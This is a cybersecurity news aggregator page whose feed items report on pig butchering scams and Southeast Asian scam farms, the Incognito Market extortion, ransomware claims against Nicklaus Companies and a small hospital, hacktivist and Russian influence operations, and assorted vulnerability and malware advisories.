Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for How to protect yours ...

 Threats

Today, were discussing the increasingly common scam known as pig butchering. Due to its high profitability, this scheme is rapidly gaining popularity among fraudsters, and the number of victims is constantly growing. What is it? How does it work? And how can you protect yourself? Well cover it all in todays post. What   show more ...

is pig butchering and how does this scam work? Pig butchering is a type of scam associated, on the one hand, with investing (often in cryptocurrencies), and on the other, with online romantic relationships. Just as pigs are raised for a long time before being slaughtered, in the pig butchering fraud scheme, scammers typically spend a lot of time and effort carefully courting their victims — usually over a period of weeks or even months. In this regard, pig butchering differs significantly from other fraudulent schemes, whose creators are often impatient and looking for quick profits. The setup: a random message and a friendly stranger It all starts with some random message in a messenger, social network or SMS. The scammer either pretends to have sent the message to the wrong recipient or refers to some distant mutual acquaintance that are easy to find and collect information about from the victims social media profile. If the victim responds to the scammer, saying something like Youve got the wrong number, the scammer politely apologizes and tries to initiate a casual conversation. Message by message, an ongoing relationship develops between victim and scammer. It should be noted here that scammers often deliberately select the victims based on their status and personal traits. That is, they look for reasonably well-off but perhaps lonely and vulnerable individuals who may not be opposed to engaging in conversation with a friendly stranger. At this stage, the scammers goal is to build at least friendly relations with the victim and, ideally, a romantic connection. Thus, the scammer gains the victims trust and lulls their vigilance. As mentioned earlier, these scammers are usually in no rush and spend a lot of time communicating with the victim, which is uncharacteristic of online fraudsters. So even if the victim has some suspicions at first, they tend to fade away after a while. The plot thickens: an opportunity to invest profitably Sooner or later, the scammer finds a way to steer the conversation toward financial topics. Specific approaches here may vary, but the general idea is that the scammer carefully presents the victim with an opportunity to make a profitable investment. This could be something traditional like stocks, bonds, futures or options. But lately, its more often associated with some promising cryptocurrency projects. The overall complexity and opacity of crypto, coupled with the ease of moving funds, make it ideal for such fraud. At this stage, the victim may become alarmed and suspect something is amiss. However, the scammer is quick to reassure their precious… pig: theres no need for the victim to transfer any money personally to them or anyone associated with them. All the victim needs do is simply create an account on a trading platform and try to deposit some money there to see how it works. Climax: incredible profits and new money deposits An important detail of the pig butchering scheme is that at every stage the scammer carefully maintains the victims illusion of control. The victim independently creates an account on the trading platform and can independently choose what to trade there. The scammer only provides helpful advice, making the whole process faster and easier — and of course, as profitable as possible. The scammers trading tips turn out to work well — who would have guessed it? The victim quickly makes their first profit on the trading platform, gets excited, and starts depositing more and more for even bigger earnings. Finale: the scammer vanishes with the money But of course, sooner or later, the scammer absconds. This usually happens once a reasonable balance has formed in the account. Alternatively, the scammer may milk the victim until the moment they try to withdraw money from the platform. Thats when the victim learns the truth: the trading platform was fake, and all those incredible profits just disappeared into thin air. As for the real money, it has long gone to some unknown account. At this stage, the scammer cuts all communication with the victim, deletes the accounts used for the scam, and — poof! — vanishes in a puff of smoke. The victim has lost everything invested in the platform, and were usually talking significant amounts: the fraudsters often manage to get away with tens or even hundreds of thousands of dollars — sometimes even millions. Scam farms in Southeast Asia As you may have gathered from the description of pig butchering, this scheme has several key differences from most scams. First, the criminals come well-prepared — they have effective tools to deceive their victims. Second, theyre in no hurry and are ready to work on a single target for a long time, gradually moving toward their sinister goal. Third, were talking about truly large sums of money — meaning the amount of time and effort involved eventually pays off. The secret to this success is that, in the vast majority of cases, its not individual scammers who are behind pig butchering, but large criminal groups. These organizations run huge fraudulent farms, most often located in the least prosperous countries of Southeast Asia. Such farms exist in Laos and the Philippines, but most farms are in Cambodia and, above all, Myanmar, where a civil war has been going on for several years. One of the largest scam farms engaged in pig butchering — KK Park. This farm, located in Myanmar near the border with Thailand, employs over 2000 people. Source These enterprises are truly massive: for example, a report last year about one of the largest scam farms, called KK Park, claimed that over 2000 people work there, and it has even earned its own article on Wikipedia. Moreover, the farms are constantly expanding and, of course, new ones are being opened. Generally speaking, these fraud farms should more accurately be called labor camps — and this is perhaps the saddest detail of this scheme. For it turns out that the rank-and-file operators of pig butchering — the ones who directly communicate with the victims — are usually doing so against their own will. Scam enterprises require highly skilled, well-educated, multilingual employees with strong online communication abilities. As you might imagine, such people dont naturally appear in the jungles of Myanmar or Cambodia. Usually, these are citizens of other countries who are lured by the promise of high-paying jobs — call center operators, SMM specialists, translators or IT specialists. Scam farms are constantly expanding: this photo, taken on July 1, 2023, shows the construction of a new building at KKII — a newer part of KK Park. Most likely, it has already been completed by now. Source Usually, new scam-farm workers first end up in neighboring Thailand, from where theyre taken to Myanmar or Cambodia. There theyre transported to a camp located far away from any large populated areas and have their documents confiscated. Then these people essentially become slaves: theyre forced to work 12-16 hours a day for nothing but food, can be subjected to violence, and sometimes even resold to other fraudsters. The overall scale of the problem is extremely serious. A report last year by the UN Office of the High Commissioner for Human Rights, citing reliable sources, gave the following figures: at least 120,000 people are employed in scam farms in Myanmar, and approximately another 100,000 in Cambodia. How to protect yourself from pig butchering Its difficult to calculate the exact total losses of pig butchering victims because its a global problem — scammers target citizens of different countries. In addition, not everyone reports that theyve been a victim. However, rough estimates suggest the size of the pig butchering industry runs to billions of dollars. Its a very lucrative business, so theres no use hoping the problem will simply go away by itself. Nor is there any hope that the authorities in Cambodia or Myanmar will address it — they appear to have other priorities. Therefore, unfortunately, we must protect ourselves and our loved ones on our own. Heres what we can advise: Be cautious with random online acquaintances — even if the person has been communicating with you for a long time and doesnt seem to be a scammer. Dont invest carelessly in obscure investment schemes — even if they apparently demonstrate high profitability. In particular, dont invest carelessly in cryptocurrency schemes, as due to the quirks of this topic the number of scammers in this sphere is unfortunately very high. Additionally, its important to note that all blockchain transactions are irreversible and uninsured. Remember the golden rule of investing: the higher the potential profit — the higher the risk. When it comes to risky schemes, never invest money that you are not prepared to lose. Inform your family and close ones about this fraudulent scheme — its possible that this could protect them from financial loss, plus the inevitable psychological trauma resulting from such deep deception.

image for Incognito Darknet Ma ...

 A Little Sunshine

Borrowing from the playbook of ransomware purveyors, the darknet narcotics bazaar Incognito Market has begun extorting all of its vendors and buyers, threatening to publish cryptocurrency transaction and chat records of users who refuse to pay a fee ranging from $100 to $20,000. The bold mass extortion attempt comes   show more ...

just days after Incognito Market administrators reportedly pulled an “exit scam” that left users unable to withdraw millions of dollars worth of funds from the platform. An extortion message currently on the Incognito Market homepage. In the past 24 hours, the homepage for the Incognito Market was updated to include a blackmail message from its owners, saying they will soon release purchase records of vendors who refuse to pay to keep the records confidential. “We got one final little nasty surprise for y’all,” reads the message to Incognito Market users. “We have accumulated a list of private messages, transaction info and order details over the years. You’ll be surprised at the number of people that relied on our ‘auto-encrypt’ functionality. And by the way, your messages and transaction IDs were never actually deleted after the ‘expiry’….SURPRISE SURPRISE!!! Anyway, if anything were to leak to law enforcement, I guess nobody never slipped up.” Incognito Market says it plans to publish the entire dump of 557,000 orders and 862,000 cryptocurrency transaction IDs at the end of May. “Whether or not you and your customers’ info is on that list is totally up to you,” the Incognito administrators advised. “And yes, this is an extortion!!!!” The extortion message includes a “Payment Status” page that lists the darknet market’s top vendors by their handles, saying at the top that “you can see which vendors care about their customers below.” The names in green supposedly correspond to users who have already opted to pay. The “Payment Status” page set up by the Incognito Market extortionists. We’ll be publishing the entire dump of 557k orders and 862k crypto transaction IDs at the end of May, whether or not you and your customers’ info is on that list is totally up to you. And yes, this is an extortion!!!! Incognito Market said it plans to open up a “whitelist portal” for buyers to remove their transaction records “in a few weeks.” The mass-extortion of Incognito Market users comes just days after a large number of users reported they were no longer able to withdraw funds from their buyer or seller accounts. The cryptocurrency-focused publication Cointelegraph.com reported Mar. 6 that Incognito was exit-scamming its users out of their bitcoins and Monero deposits. CoinTelegraph notes that Incognito Market administrators initially lied about the situation, and blamed users’ difficulties in withdrawing funds on recent changes to Incognito’s withdrawal systems. Incognito Market deals primarily in narcotics, so it’s likely many users are now worried about being outed as drug dealers. Creating a new account on Incognito Market presents one with an ad for 5 grams of heroin selling for $450. New Incognito Market users are treated to an ad for $450 worth of heroin. The double whammy now hitting Incognito Market users is somewhat akin to the double extortion techniques employed by many modern ransomware groups, wherein victim organizations are hacked, relieved of sensitive information and then presented with two separate ransom demands: One in exchange for a digital key needed to unlock infected systems, and another to secure a promise that any stolen data will not be published or sold, and will be destroyed. Incognito Market has priced its extortion for vendors based on their status or “level” within the marketplace. Level 1 vendors can supposedly have their information removed by paying a $100 fee. However, larger “Level 5” vendors are asked to cough up $20,000 payments. The past is replete with examples of similar darknet market exit scams, which tend to happen eventually to all darknet markets that aren’t seized and shut down by federal investigators, said Brett Johnson, a convicted and reformed cybercriminal who built the organized cybercrime community Shadowcrew many years ago. “Shadowcrew was the precursor to today’s Darknet Markets and laid the foundation for the way modern cybercrime channels still operate today,” Johnson said. “The Truth of Darknet Markets? ALL of them are Exit Scams. The only question is whether law enforcement can shut down the market and arrest its operators before the exit scam takes place.”

image for Sophisticated Fraud ...

 Firewall Daily

In recent years, the financial industry in India has been marred by the spread of pig butchering scams, a sophisticated network of fraudulent schemes targeting unsuspecting investors.  These scams, originating from China in 2020, have since evolved into a pervasive threat, infiltrating various Asian countries,   show more ...

including India, Taiwan, and Korea.  The modus operandi of these fraudsters revolves around the creation and dissemination of counterfeit trading applications, designed to mimic legitimate platforms and lure investors with promises of lucrative returns.  Source: Cyble Understanding the Pig Butchering Scams: The Beginning Source: Cyble The pig butchering scam, aptly named for its ruthless nature in cutting away investors’ funds, is a confidence trick used by scammers to commit investment fraud. In most pig butchering scams, scammers lure unsuspecting victims into making contributions, in the form of cryptocurrency, to a seemingly sound investment before the party they are dealing with disappears. Source: Cyble These scams operate on the premise of exploiting investors’ trust through deceptive practices, primarily leveraging digital platforms like social media and mobile applications. By masquerading as legitimate brokerage firms or trading platforms, fraudsters initiate contact with potential victims, gradually building trust and credibility before stealing online funds.  According to Cyble Research and Intelligence Labs (CRIL), the proliferation of pig butchering scams in India has been facilitated by the widespread use of social media platforms such as Facebook and Instagram.  Source: Cyble Through targeted advertisements promising substantial profits in the stock market, scammers initiate contact with individuals, often directing them to join WhatsApp or Telegram groups. Within these groups, victims are bombarded with promises of insider tips and high returns, fostering a false sense of security and trust in the scam operators. Digging Deeper Into Pig Butchering Scams in India The pig butchering scams in India follow a carefully orchestrated script, beginning with enticing social media advertisements that lure users into joining trading groups promising insider knowledge and lucrative investment opportunities. Victims initially experience success as scammers provide recommendations on profitable stocks, leading to small gains and fostering trust.  However, the scheme takes a disturbing turn when victims are introduced to counterfeit trading applications that offer even greater returns. As victims invest large sums, they find themselves unable to withdraw funds, ultimately realizing they’ve fallen prey to a scam. CRIL’s report has led to the unmasking of the perpetrators behind them. Investigations have revealed a web of compromised developer accounts used to disseminate fraudulent applications.  Source: Cyble Chinese cybercriminals have been implicated in orchestrating these schemes, evident from linguistic clues in source codes and arrests made by Indian authorities. Moreover, scammers have gone to great lengths to lend credibility to their operations, even impersonating reputable Indian brokerage firms. Source: Cyble Moreover, the pig butchering scam transcends geographical boundaries, with incidents reported in countries beyond India’s borders. Taiwan and Korea have also fallen victim to similar schemes, highlighting the global reach of these fraudulent activities.  The Role of Trading Applications and Government Intervention Source: Cyble Counterfeit trading applications play a crucial role in helping these scams. By masquerading as legitimate platforms, they lure investors into their trap, promising substantial returns that never materialize. Phishing sites further compound the issue, distributing fake applications under the guise of renowned Indian brokers, thereby amplifying the scam’s reach and sophistication. According to a The Wall Street Journal report, China has intensified efforts to dismantle cybercrime groups operating from neighboring countries, targeting individuals worldwide in pig butchering scams.  In a sweeping crackdown last year, China has apprehended 31,000 suspects in Myanmar, a major hub for such crimes. This crackdown has dealt a blow to these networks, with several fraud dens eradicated, as announced by China’s Ministry of Public Security. Moreover, authorities have intensified efforts to dismantle these scam networks, resulting in arrests and seizures of assets. Recent crackdowns in India have led to the apprehension of individuals linked to Chinese cybercriminals, shedding light on the intricate web of international cooperation required to combat such crimes effectively. Source: Cyble In addition to pig butchering scams, a new threat has emerged in the form of the Telegram Task Scam. Operating on a similar premise, this scam entices victims with promises of easy tasks and lucrative rewards. However, as with pig butchering scams, the scheme ultimately leads to financial loss for unsuspecting participants. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Nicklaus Companies F ...

 Firewall Daily

The Nicklaus Companies, led by golfing icon Jack Nicklaus, has allegedly fallen victim to a cyberattack claimed by the LockBit ransomware group. A chilling message on the dark web includes a countdown, suggesting that compromised data will be released to the public in less than a week. Nicklaus Companies, renowned for   show more ...

its association with Jack William Nicklaus, affectionately known as “the Golden Bear,” boasts a diverse portfolio spanning golf course design, real estate development, and the global marketing of lifestyle products under Jack Nicklaus and Golden Bear brands.  LockBit Ransomware Group Claims Nicklaus Companies Cyberattack  Source: X The Cyber Express has reached out to the organization to learn more about this Nicklaus Companies cyberattack. However, at the time of writing this, no official statement or response has been recorded, leaving the claims for the Nicklaus Companies cyberattack stand unverified.  While the Nicklaus Companies website appears to be unaffected by the purported attack, the LockBit ransomware group, known for its sophisticated tactics, typically operates behind the scenes, targeting databases and the backend of the websites instead of launching a front-end assault.  However, the interesting fact about this cyberattack on Nicklaus Companies is that the threat actor involved in this assault was recently seized by law enforcement authorities. Operation Cronos, a collaborative effort involving authorities from the UK, USA, Europol, and other jurisdictions, was initiated to disrupt the operations of LockBit and aid ransomware victims in recovering their data. Persistent Cyberattacks by the LockBit Ransomware Group Progress was made with the apprehension of four suspects across the USA, Poland, and Ukraine. However, LockBit wasted no time in resuming its nefarious activities on the dark web, despite law enforcement’s efforts to dismantle its infrastructure and seize crucial assets. Of particular concern is LockBit’s claim to possess sensitive data, including court documents related to the contentious election subversion case involving former U.S. President Donald Trump, sourced from Fulton County, Georgia. While there is no concrete evidence to support the assertion that LockBit breached the FBI, the group’s display of stolen information highlights the gravity of the situation. As part of Operation Cronos, authorities managed to shut down several dark web platforms utilized by LockBit for data leaks and extortion demands. However, the emergence of a new dark web leak site over the weekend, featuring a list of victims that includes Fulton County and the FBI, suggests that LockBit remains undeterred in its pursuit of illicit gains. With regard to the Nicklaus Companies cyberattack, The Cyber Express will be closely monitoring the situation and we’ll update this post once we have more information on the threat actor or any official statement from the organization.  Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for BianLian Ransomware ...

 Firewall Daily

The Lindsay Municipal Hospital cyberattack has been claimed by the BianLian ransomware group. This nefarious organization, known for its disruptive tactics, allegedly breached the security measures of the hospital’s system, adding another institution to its list of targets within the United States. Accompanying   show more ...

their hospital cyberattack claims were brief insights into the Lindsay Municipal Hospital’s profile and its history of service to the Lindsay community and its surrounding areas. The hospital, boasting a 26-bed acute care facility, also housed a Level IV emergency department, a full-service laboratory, and a radiology department offering essential services such as x-rays, ultrasounds, and CT scans. Alleged Lindsay Municipal Hospital Cyberattack Claims on Dark Web Source: X The Cyber Express has reached out to the hospital to learn more about this Lindsay Municipal Hospital cyberattack. However, at the time of writing this, no official statement or response has been recorded, leaving the claims for the Lindsay Municipal Hospital cyberattack stand unverified.  Interestingly, while the website for Lindsay Municipal Hospital appeared to be operational, showing no immediate signs of the cyberattack, experts speculated that the BianLian ransomware group might have targeted the backend infrastructure rather than launching a front-end assault such as a Distributed Denial of Service (DDoS) attack. This incident at Lindsay Municipal Hospital is not an isolated one but rather a part of a larger campaign targeting hospitals across the United States. Just weeks prior, on February 21st, Change Healthcare, a subsidiary of UnitedHealth Group, fell victim to a similar cybersecurity breach.  Cyberattacks on US Hospitals: A Targeted Campaign Described by industry experts and officials as one of the most serious cyberattacks in the history of the U.S. healthcare system, the breach at Change Healthcare disrupted critical services, including the transmission of patients’ healthcare claims and financial transactions. Although the outage did not directly impact patient care systems, it exposed a glaring vulnerability in the nation’s healthcare infrastructure, causing widespread frustration and financial instability. Additionally, the impact of a cyberattack on Change Healthcare reverberates across healthcare systems, affecting payment pipelines, insurance authorization, and medical records. With 14 billion annual transactions, the disruption extends beyond pharmacies, impacting hospitals’ revenue and patient care verification.  CommonWell, a medical records-sharing institution relying on Change technology, halted services, affecting 208 million individuals. The suspected perpetrator, ALPHV, known as BlackCat, has a history of ransomware attacks, prompting global law enforcement action.  Who is the BianLian Ransomware Group? BianLian, a ransomware group, has been targeting critical infrastructure sectors in the U.S. and Australia since June 2022. They exploit RDP credentials, use open-source tools for discovery, and extort data via FTP or Rclone. FBI, CISA, and ACSC advise implementing mitigation strategies to prevent ransomware attacks. Moreover, a detailed analysis by GuidePoint Security’s GRIT team sheds light on BianLian’s modus operandi. According to the report by Drew Schmitt, BianLian’s PowerShell backdoor, is linked to TeamCity vulnerabilities, providing insights into their tactics. The analysis reveals BianLian’s use of a novel PowerShell backdoor, its exploitation of TeamCity flaws, and attribution methods. Initially employing a double-extortion model, they shifted to exfiltration-based extortion by 2023. FBI and ACSC advise implementing defenses to prevent ransomware attacks. BianLian gains access through compromised RDP credentials and employs various techniques for persistence, lateral movement, and data exfiltration, threatening to publish victim data if ransom demands aren’t met. They use tools like PowerShell, Rclone, and FTP for exfiltration, and employ additional tactics like threatening calls and printing ransom notes to pressure victims. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Nebula Hackers Claim ...

 Firewall Daily

Nebula, an anti-Putin hacktivist group, claimed a cyberattack on Russian election systems, targeting critical infrastructure for the upcoming Russian election. In their dark web post, the threat actor posted a message aimed directly at the Moscow Government, encrypting several systems and leaving a “big” demand   show more ...

for ransom. The message, originating from the self-proclaimed “Mothership,” urged the government to reconsider its actions amidst the election season. Nebula emphasized the importance of resisting what they deemed a “sham” election and called upon the people to unite and fight against it. With the encrypted systems including critical government websites and networks, Nebula sent a clear message: they were determined to disrupt the electoral process. Nebula Hacker Group Claims Cyberattack on Russian Election Systems Source: CyberKnow on X The cyberattack hits Russia at a critical moment as the country prepares for a presidential election. President Vladimir Putin is expected to win another term, yet the campaign faces controversy as opposition candidates confront obstacles in their candidacy process. Despite efforts from opposition figures like Boris Nadezhdin and Yekaterina Duntsova, who sought to challenge Putin’s stance on issues like the campaign in Ukraine, their applications were denied. This left only a handful of candidates, all of whom supported Putin’s policies, to participate in the election. Critics of the Kremlin argued that these candidates merely provided a facade of choice, while independent observers raised concerns about potential electoral manipulation. Nebula’s cyberattack adds another layer of complexity to an already tense situation. Known for their previous hacks on Russian government systems, Nebula has consistently challenged the status quo. Their latest attack highlights the growing trend of cyber warfare in global politics, particularly in conflicts like the ongoing war in Ukraine. Who is the Nebula Hacker Group? In addition to targeting government systems, Nebula also made headlines for infiltrating Tehtrans, a corporation potentially linked to Russia’s rail industry. By gaining access to the company’s cameras and even altering its website to feature a playable version of Pac-Man, Nebula demonstrated its ability to penetrate seemingly secure networks. Nebula, a group with pro-Ukrainian agenda, inadvertently exposed its activities during a breach of Russian software company Insoft.ru. The leaked screenshots revealed Meterpreter shells accessing Insoft’s infrastructure, likely originating from IPs owned by LimeNet in the Netherlands.  Despite attributions to the IT Army of Ukraine (volunteer cyberwarfare organisation), Nebula’s actions contradict their philosophy, targeting medical and Russian entities. This opportunistic behavior hints at broader geopolitical tensions, with Nebula possibly sending a warning to Iran due to its support for Russia. Whether this sporadic cyber activity against Iranian assets evolves into a sustained trend remains to be seen. Moreover, the cybersecurity domain in Russia has become increasingly volatile, with both international and domestic hackers targeting government institutions and businesses associated with the war effort in Ukraine. Groups like NB65, reportedly composed of former Anonymous members, have successfully breached organizations like Roscosmos, Russia’s space agency, showcasing the vulnerability of even the most sophisticated systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Trends, Reports, Analysis

AI has given malicious attackers superpowers, making fishing, smishing, vishing, and other attacks more accessible and impactful. Immediate threats include sensitive data leakage from AI-powered systems.

 Malware and Vulnerabilities

Planet Stealer is a Go-based information-stealing trojan that targets sensitive information from victim hosts. The trojan's capabilities include browser information theft, cryptocurrency wallet theft, and sandbox evasion.

 Malware and Vulnerabilities

Cisco Secure Client is affected by two high-severity vulnerabilities, CVE-2024-20337 and CVE-2024-20338, which could lead to code execution and unauthorized remote access VPN sessions.

 Companies to Watch

The Series A funding was led by new investors Ballistic Ventures and Artisanal Ventures, as well as existing backers Webb Investment Network, Ridge Ventures, and TechOperators.

 Trends, Reports, Analysis

New research by Cymulate highlights the correlation between threat exposures, vulnerabilities, misconfigurations, and security controls. It emphasizes the importance of proactive security measures to prevent cyberattacks.

 Malware and Vulnerabilities

The BianLian ransomware group exploited vulnerabilities in JetBrains TeamCity software to gain initial access to target environments. The group attempted to execute a custom GO backdoor but switched to LotL and utilized a PowerShell backdoor instead.

 Malware and Vulnerabilities

The developers of the Leather cryptocurrency wallet have issued a warning about a counterfeit app on the Apple App Store. This fake app has led to users reporting that it drains their wallets and steals their digital assets.

 Feed

Ubuntu Security Notice 6687-1 - It was discovered that AccountsService called a helper incorrectly when performing password change operations. A local attacker could possibly use this issue to obtain encrypted passwords.

 Feed

Debian Linux Security Advisory 5638-1 - It was discovered that the uv_getaddrinfo() function in libuv, an asynchronous event notification library, incorrectly truncated certain hostnames, which may result in bypass of security measures on internal APIs or SSRF attacks.

 Feed

Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems.

 Feed

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

 Firewall Daily

A recent security report from Lithuania highlights a concerning increase in Russian influence operations targeting the Baltic States and Poland. These campaigns are noted for their escalating aggressiveness and sophistication, with a notable impact on society. Since the onset of the Russia and Ukraine war, the   show more ...

narratives of these information campaigns have sought to reduce the apparent importance of Western sanctions on Russia’s economy, instigate hatred against Ukraine, and target Western countries.  Moreover, these campaigns have aimed to create fear and panic among the populace, disrupt state institutions’ functioning, and breed dissatisfaction with government decisions within the targeted countries. Russian Influence Operations: Cyberattacks on Baltic States  Several Russian states, specifically Moscow, have made it clear to undermine the impact of Western sanctions, fueling animosity towards Ukraine, and pushing Western products out of the nation. Moreover, apart from defying Western technologies and services, the cyberattacks on Baltic states and Poland inadvertently spread fear, disrupting institutional operations, and fostering public discontent. One particular tactic was the circulation of false bomb threats in Lithuanian schools, particularly during sensitive periods like the start of the school year and teachers’ strikes. These threats, made primarily through Russian-language hoax calls, placed immense pressure on national resources. Despite crackdowns on Russian propaganda outlets, the Russian hacker groups have managed to bypass sanctions by replicating banned channels, thereby conserving its narratives and undermining media integrity.  Recent developments, such as the launch of Sputnik radio broadcasts from Kaliningrad into Lithuanian cities, illustrate Russia’s determination to bypass sanctions and continue pushing its agenda. By combining influence operations with cyberattacks, Russia has been able to strike efficiently, and anonymously. This digital toolkit has been deployed not only against the Baltic States but also against former Soviet nations like Moldova, highlighting the broader scope of hybrid threats. Recent Cases Highlighting the Russian Campaign  With events like Moldova’s elections and EU membership referendum, Russia’s hybrid attacks and manipulation of social networks are expected to escalate, spreading hostility, undermining trust in institutions, and weakening support for Ukraine. Earlier this year, cyberattacks on Lithuania saw several prominent organizations falling victim to cyberattacks attributed to the Russian hacker group NoName ransomware. The affected websites of organizations included Compensa Vienna Insurance Group, If Insurance, Lithuanian Roads Association, AD REM, INIT, and Balticum. In December 2023, the NoName057 hacker group allegedly executed a series of DDoS attacks on Lithuanian websites, targeting sectors such as defense, roads, logistics, mobile operators, telecommunications, internet providers, and authorization services. The threat actors not only claimed responsibility for the attacks but also criticized the Lithuanian authorities. Furthermore, a cyber attack on the Lithuanian government in July 2023, allegedly linked to the NATO summit leak, revealed sensitive information regarding the summit’s security. The hackers, operating under the name “From Russia with love,” claimed to have accessed information on officials in charge, delegation movement routes, and security systems. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Firewall Daily

With human error responsible for almost two-thirds of cyber incidents in the last two years, over 50% of current cybersecurity professionals acknowledge making mistakes in the early stages of their careers due to insufficient theoretical or practical knowledge. This acknowledgment becomes even more pronounced among   show more ...

those with two to five years of experience, with nearly 60% admitting to similar missteps. In the Middle East, Turkey, and Africa (META) region, 43% of all respondents concede to making such errors. According to a recent Kaspersky study over the past two years, organizations have suffered at least one cyber incident due to a lack of qualified cybersecurity staff. The Uphill Battle of Cybersecurity Hiring While sourcing more qualified cybersecurity staff might be one of the solutions to tackle this problem, businesses worldwide are facing a lack of information security (InfoSec) professionals. According to current estimates, the cyber-workforce shortfall totals nearly 4 million.   The general cybersecurity skills gap is accompanied by the fact that many new starters in the industry must cope with the gaps in practical and theoretical knowledge, resulting in initial struggles and making errors in their job. Some of the most common mistakes made by InfoSec professionals in the META region early in their careers turned out to be using weak or guessable passwords (52%), the lack of identity protection implemented (48%), the use of outdated security measures (35%). Neglecting to perform backups of important data (34%) was also a common mistake cybersecurity experts made at the beginning of their career.  As cybersecurity professionals acknowledge they might not have had the required skillset and hands-on experience when entering the field, some point at additional difficulties with jump-starting their careers. Despite the cyber industry continuously reporting a workforce gap, 34% of respondents claim to have had three or more failed interviews before being selected for an InfoSec role. In the META region the process is smoother with just 21% saying they needed to undergo interviews more than once or twice.  “It’s no secret that formal training programs often struggle to keep up with industry developments, and that is especially true for the cybersecurity field,” comments Marina Alekseeva, Chief Human Resources Officer at Kaspersky. “The fact that many employees in the market might have limited practical skills or gaps in their knowledge underlines the importance of a comprehensive onboarding process with a focus on peer learning and means companies must pay more attention to the upskilling of their employees,” Alekseeva added. Cyber Career Challenges and Resilience Initial challenges cybersecurity experts face when they join the industry may explain why nearly half of InfoSec professionals (46%) globally and one in three (32%) in the META region say that it took them more than a year to feel comfortable in their first cybersecurity roles. While 31% of respondents managed to get to grips with their job within one or two years, 9% of respondents said the process took them two to three years and 6% – more than three years. In the META the respective figures are 21%, 7% and 4%. The extensive list of factors contributing to cyber incidents highlight the myriad considerations that employees—particularly those outside the IT department—must bear in mind to minimize the likelihood of errors. For instance, the rise of shadow IT (11%) poses a growing concern for organizations as employees increasingly operate beyond the confines of traditional office spaces and are entrusted with remote devices, both for work and personal use. It’s worth noting that these causes are more often accidental than intentional. Only 8% of incidents stemmed from violations of information security policies by non-IT employees. However, the financial services sector stands out in this regard. Violations of information security policies by non-IT staff in this industry account for 22% of cyber incidents, while 34% cite intentionally malicious behavior by both IT and non-IT employees as a notably more prevalent issue. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

 Feed

Technical specifics and a proof-of-concept (PoC) exploit have been made available for a recently disclosed critical security flaw in Progress Software OpenEdge Authentication Gateway and AdminServer, which could be potentially exploited to bypass authentication protections. Tracked as CVE-2024-1403, the vulnerability has a maximum severity rating of 10.0 on the CVSS scoring system. It

 Feed

A financially motivated threat actor called Magnet Goblin is swiftly adopting one-day security vulnerabilities into its arsenal in order to opportunistically breach edge devices and public-facing services and deploy malware on compromised hosts. “Threat actor group Magnet Goblin’s hallmark is its ability to swiftly leverage newly disclosed vulnerabilities, particularly targeting

 Feed

The threat actors behind the BianLian ransomware have been observed exploiting security flaws in JetBrains TeamCity software to conduct their extortion-only attacks. According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident "began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of

 Feed

As cyber threats loom around every corner and privileged accounts become prime targets, the significance of implementing a robust Privileged Access Management (PAM) solution can't be overstated. With organizations increasingly migrating to cloud environments, the PAM Solution Market is experiencing a transformative shift toward cloud-based offerings. One Identity PAM Essentials stands

 Feed

Users in Brazil are the target of a new banking trojan known as CHAVECLOAK that's propagated via phishing emails bearing PDF attachments. "This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said. The attack chain involves the use of

 Feed

As the shift of IT infrastructure to cloud-based solutions celebrates its 10-year anniversary, it becomes clear that traditional on-premises approaches to data security are becoming obsolete. Rather than protecting the endpoint, DLP solutions need to refocus their efforts to where corporate data resides - in the browser. A new guide by LayerX titled "On-Prem is Dead. Have You Adjusted Your Web

 Cyber Security News

Source: www.proofpoint.com – Author: 1 This week we are joined by, Selena Larson from Proofpoint, who is discussing their research, “Bumblebee Buzzes Back in Black.” Bumblebee is a sophisticated downloader used by multiple cybercriminal threat actors and was a favored payload from its first   show more ...

appearance in March 2022 through October 2023 before disappearing. After a […] La entrada Research Saturday Podcast: The return of a malware menace. – Source: www.proofpoint.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 cyber

Source: www.proofpoint.com – Author: 1 Organizations continue to race against cybercriminals to keep their systems secure by focusing on defensive measures, including addressing supply chain weaknesses, removing software vulnerabilities and exploring alternatives to traditional passwords.  Ransomware remains   show more ...

the predominant attack approach they face. Last year’s record number of ransomware attacks included a 67% year-over-year increase […] La entrada Cyber defenses ramp up as hacks exploit gaps – Source: www.proofpoint.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Conservatives

Source: www.databreachtoday.com – Author: 1 Cyber Insurance , Fraud Management & Cybercrime , Geo Focus: The United Kingdom Committee Chairs Accuses UK of Favoring an ‘Ostrich Strategy’ For Ransomware Akshaya Asokan (asokan_akshaya) • March 10, 2024     The U.K. Conservative government   show more ...

